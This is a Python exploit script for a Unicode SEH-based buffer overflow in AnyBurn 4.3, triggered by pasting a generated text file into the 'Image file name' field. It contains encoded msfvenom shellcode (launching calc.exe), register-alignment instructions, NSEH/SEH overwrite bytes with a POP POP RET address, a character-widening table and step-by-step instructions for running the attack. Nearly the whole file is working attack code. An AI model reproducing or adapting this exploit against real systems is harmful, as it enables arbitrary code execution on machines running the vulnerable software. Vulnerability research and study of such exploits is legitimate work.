#!/usr/bin/python
# Exploit Title: Anyburn 4.3 - 'Copy disc to image file' Buffer Overflow - (UNICODE)(SEH)
# Version: 4.3
# Date: 07-03-2019
# Author: Hodorsec (hodorsec@protonmail.com / hodor@hodorsec.com)
# Vendor Homepage: http://www.anyburn.com/
# Software Link: http://www.anyburn.com/download.php
# Tested on: Win7 x86 SP1 build 7601
# Caveats: - Bytes 0x80-0x9f are not simply zero-extended when the pasted text is widened to UTF-16:
#            they are translated through the table below. The NSEH byte (0x83) and the SEH byte (0x95)
#            depend on that translation; I've mapped the character translation for convenience.
# - Adjust the 'crash_nseh' and 'ret_jmp' offsets for other Windows versions / service packs; the 'seh'
#   POP POP RET address (0x00470095 --> 0x00472022) comes from AnyBurn.exe itself and is specific to this build.
#
# Character expansion mapping (pasted byte --> UTF-16 code unit). This is the Windows-1252 0x80-0x9f row,
# so on a system with a different ANSI code page these bytes widen differently and the NSEH/SEH bytes break.
# 80 --> 20ac, 81 --> 81
# 82 --> 201a, 83 --> 0192
# 84 --> 201e, 85 --> 2026
# 86 --> 2020, 87 --> 2021
# 88 --> 02c6, 89 --> 2030
# 8a --> 0160, 8b --> 2039
# 8c --> 0152, 8d --> 8d
# 8e --> 017d, 8f --> 8f
# 90 --> 90 , 91 --> 2018
# 92 --> 2019, 93 --> 201c
# 94 --> 201d, 95 --> 2022
# 96 --> 2013, 97 --> 2014
# 98 --> 02dc, 99 --> 2122
# 9a --> 0161, 9b --> 203a
# 9c --> 0153, 9d --> 9d
# 9e --> 017e, 9f --> 0178
#
# PoC
# 1.) Run this script to generate sploit_anyburn_seh_unicode.txt, copy the contents to clipboard
# 2.) In the application, open 'Copy disc to image file'
# 3.) Paste the contents of the TXT file in 'Image file name'
# 4.) Click "Create Now" and watch Anyburn BURN!

import sys, struct

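filename = "sploit_anyburn_seh_unicode.txt"

# Maximum length of the generated string, counted in pasted bytes (before the
# application widens every byte to a 2-byte UTF-16 unit).
maxlen = 10000

# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -f python -b "\x00\x0a\x0d" -v shellcode bufferregister=eax
# Size 512
# Bytes literals (b"...") are used throughout so the payload is written
# byte-for-byte by the binary open(..., 'wb') below on both Python 2 and 3.
shellcode = b""
shellcode += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
shellcode += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
shellcode += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
shellcode += b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
shellcode += b"\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
shellcode += b"\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
shellcode += b"\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
shellcode += b"\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
shellcode += b"\x75\x34\x4a\x42\x79\x6c\x39\x58\x35\x32\x6d\x30"
shellcode += b"\x4b\x50\x6b\x50\x73\x30\x64\x49\x4b\x35\x4e\x51"
shellcode += b"\x35\x70\x61\x54\x74\x4b\x6e\x70\x6e\x50\x64\x4b"
shellcode += b"\x61\x42\x7a\x6c\x72\x6b\x62\x32\x6d\x44\x64\x4b"
shellcode += b"\x44\x32\x6b\x78\x5a\x6f\x45\x67\x6f\x5a\x6b\x76"
shellcode += b"\x4d\x61\x49\x6f\x34\x6c\x4f\x4c\x43\x31\x71\x6c"
shellcode += b"\x39\x72\x4e\x6c\x4b\x70\x49\x31\x38\x4f\x4c\x4d"
shellcode += b"\x6a\x61\x76\x67\x67\x72\x58\x72\x31\x42\x62\x37"
shellcode += b"\x64\x4b\x50\x52\x7a\x70\x32\x6b\x4f\x5a\x4f\x4c"
shellcode += b"\x42\x6b\x70\x4c\x6b\x61\x34\x38\x7a\x43\x51\x38"
shellcode += b"\x6d\x31\x78\x51\x6f\x61\x52\x6b\x30\x59\x6f\x30"
shellcode += b"\x4b\x51\x79\x43\x72\x6b\x4f\x59\x5a\x78\x68\x63"
shellcode += b"\x6c\x7a\x30\x49\x62\x6b\x4e\x54\x42\x6b\x6b\x51"
shellcode += b"\x4a\x36\x4c\x71\x6b\x4f\x44\x6c\x46\x61\x78\x4f"
shellcode += b"\x4c\x4d\x69\x71\x56\x67\x6c\x78\x57\x70\x63\x45"
shellcode += b"\x59\x66\x6a\x63\x51\x6d\x4a\x58\x4d\x6b\x71\x6d"
shellcode += b"\x4e\x44\x52\x55\x4b\x34\x42\x38\x54\x4b\x4e\x78"
shellcode += b"\x6b\x74\x79\x71\x79\x43\x53\x36\x74\x4b\x4a\x6c"
shellcode += b"\x50\x4b\x34\x4b\x31\x48\x4d\x4c\x69\x71\x57\x63"
shellcode += b"\x72\x6b\x4a\x64\x74\x4b\x69\x71\x78\x50\x31\x79"
shellcode += b"\x50\x44\x6d\x54\x6c\x64\x71\x4b\x51\x4b\x70\x61"
shellcode += b"\x72\x39\x70\x5a\x30\x51\x39\x6f\x6b\x30\x61\x4f"
shellcode += b"\x31\x4f\x6f\x6a\x32\x6b\x4d\x42\x4a\x4b\x72\x6d"
shellcode += b"\x4f\x6d\x51\x5a\x39\x71\x42\x6d\x75\x35\x75\x62"
shellcode += b"\x4d\x30\x59\x70\x4d\x30\x70\x50\x33\x38\x6e\x51"
shellcode += b"\x52\x6b\x42\x4f\x53\x57\x6b\x4f\x46\x75\x55\x6b"
shellcode += b"\x6a\x50\x46\x55\x33\x72\x4f\x66\x62\x48\x66\x46"
shellcode += b"\x72\x75\x65\x6d\x43\x6d\x39\x6f\x67\x65\x6d\x6c"
shellcode += b"\x39\x76\x61\x6c\x4a\x6a\x31\x70\x59\x6b\x79\x50"
shellcode += b"\x74\x35\x49\x75\x35\x6b\x6f\x57\x6e\x33\x72\x52"
shellcode += b"\x62\x4f\x70\x6a\x39\x70\x42\x33\x39\x6f\x49\x45"
shellcode += b"\x42\x43\x4f\x71\x52\x4c\x70\x63\x4c\x6e\x30\x65"
shellcode += b"\x51\x68\x51\x55\x49\x70\x41\x41"

# Align reg EBP to RET into EAX
# EBP = 0x04f6acb8, Buffer = 0x04f6b70a, Buffer - EBP = 0x0a52 --> 0x0b00
# Each instruction is separated by a 0x73 pad byte: 0x73 widens to "73 00"
# (JAE +0, a 2-byte no-op), and the null that follows a 1-byte instruction is
# absorbed as "00 73 00" (ADD [EBX], DH). NOTE(review): that absorption writes
# to [EBX], so EBX presumably points at writable memory when this runs (the
# author reports the chain working) -- confirm in a debugger before porting.
align_ebp = (
    b"\x73"          # Padding
    b"\x55"          # PUSH EBP
    b"\x73"          # Padding
    b"\x58"          # POP EAX
    b"\x73"          # Padding
    b"\x05\x0f\x11"  # widens to 05 00 0f 00 11 --> ADD EAX,0x11000f00 --
    b"\x73"          # Padding                                        |--> Adds 0x0b00 bytes
    b"\x2d\x04\x11"  # widens to 2d 00 04 00 11 --> SUB EAX,0x11000400 --/
    b"\x73"          # Padding
    b"\x50"          # PUSH EAX
    b"\x73"          # Padding
    b"\xc3"          # RET
)

# Offsets (counted in pasted bytes, i.e. before UTF-16 widening)
crash_nseh = 9197  # NSEH, might be different on other Windows version/SP
# SEH handler slot: 4 widened bytes after NSEH. Informational only -- the
# generated file places the 2 SEH bytes directly after the 2 NSEH bytes.
crash_seh = crash_nseh + 4
# Where align_ebp's RET lands: EBP + 0x0b00 is 0xb00 - 0xa52 = 0xae = 174
# widened bytes past the buffer start, i.e. 87 pasted bytes -> shellcode here.
ret_jmp = 87

# Variables
prefix = b"\x73" * ret_jmp  # Padding up to the address align_ebp returns into
prefix += shellcode  # UNICODE encoded shellcode
if len(prefix) > crash_nseh:
    # A negative repeat count would silently produce no padding and shift
    # NSEH/SEH off their slots; fail loudly instead.
    raise ValueError("shellcode overruns the NSEH slot by %d bytes"
                     % (len(prefix) - crash_nseh))
prefix += b"\x73" * (crash_nseh - len(prefix))  # Additional padding to reach NSEH
nseh = b"\x83\x43"  # 0x83 expands to 0x0192 --> XCHG EAX,EDX # Expanded instruction in SEH now does get executed due to swapped regs
seh = b"\x95\x47"  # 0x00470095 expands to 0x00472022 --> POP POP RET # AnyBurn.exe
suffix = align_ebp  # Align registers to jump to beginning of buffer
fixed_len = len(prefix + nseh + seh + suffix)
if fixed_len > maxlen:
    raise ValueError("payload needs %d bytes but maxlen is %d" % (fixed_len, maxlen))
suffix += b"\x73" * (maxlen - fixed_len)  # Padding

# Crafting payload
payload = prefix + nseh + seh + suffix

# The shellcode was generated with -b "\x00\x0a\x0d"; the clipboard/text-field
# delivery path would also truncate or mangle these, so refuse to emit them.
for bad in (b"\x00", b"\x0a", b"\x0d"):
    if bad in payload:
        raise ValueError("payload contains bad char 0x%02x" % ord(bad))

# Create file (only when run as a script, so importing the module for
# inspection has no side effects)
if __name__ == "__main__":
    with open(filename, "wb") as f:
        f.write(payload)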